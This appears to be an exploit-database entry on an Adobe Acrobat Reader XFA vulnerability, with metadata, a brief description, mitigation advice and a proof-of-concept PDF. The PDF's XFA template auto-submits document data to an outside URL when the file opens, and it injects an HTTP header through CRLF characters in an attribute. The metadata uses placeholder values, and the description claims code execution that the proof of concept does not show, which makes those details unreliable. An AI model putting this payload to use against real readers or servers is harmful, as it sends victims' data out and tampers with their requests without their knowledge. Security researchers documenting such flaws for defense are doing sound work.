PDF File XFA Exploit

vendor:

Adobe Acrobat Reader

by:

Ange Albertini

7.5

CVSS

HIGH

XFA Exploit

CWE

Product Name: Adobe Acrobat Reader

Affected Version From: Unknown

Affected Version To: Unknown

Patch Exists: NO

Related CWE: CVE-XXXX-XXXX

CPE: a:adobe:acrobat_reader

Metasploit:

Other Scripts:

Platforms Tested: Windows, Linux, Mac

2012

This exploit allows an attacker to execute arbitrary code by using a specially crafted PDF file with XFA (XML Forms Architecture) support. By embedding malicious code in the XDP template, the attacker can trigger the execution of the code when the PDF is opened.

Mitigation:

To mitigate this vulnerability, it is recommended to disable XFA support in PDF readers or use a PDF reader that does not support XFA. Regularly updating the PDF reader software to the latest version is also advised.

Source

Exploit-DB raw data:

% a PDF file using an XFA
% most whitespace can be removed (truncated to 570 bytes or so...)
% Ange Albertini BSD Licence 2012
% modified by InsertScript 

%PDF-1. % can be truncated to %PDF-\0

1 0 obj <<>>
stream
<xdp:xdp xmlns:xdp="http://ns.adobe.com/xdp/">
<config><present><pdf>
    <interactive>1</interactive>
</pdf></present></config>

<template>
    <subform name="_">
        <pageSet/>
        <field id="Hello World!">
            <event activity="docReady" ref="$host" name="event__click">
               <submit 
                     textEncoding="UTF-16&#xD;&#xA;test: test&#xD;&#xA;"
                     xdpContent="pdf datasets xfdf"
                     target="http://example.com/test"/>
            </event>
</field>
    </subform>
</template>
</xdp:xdp>
endstream
endobj

trailer <<
    /Root <<
        /AcroForm <<
            /Fields [<<
                /T (0)
                /Kids [<<
                    /Subtype /Widget
                    /Rect []
                    /T ()
                    /FT /Btn
                >>]
            >>]
            /XFA 1 0 R
        >>
        /Pages <<>>
    >>
>>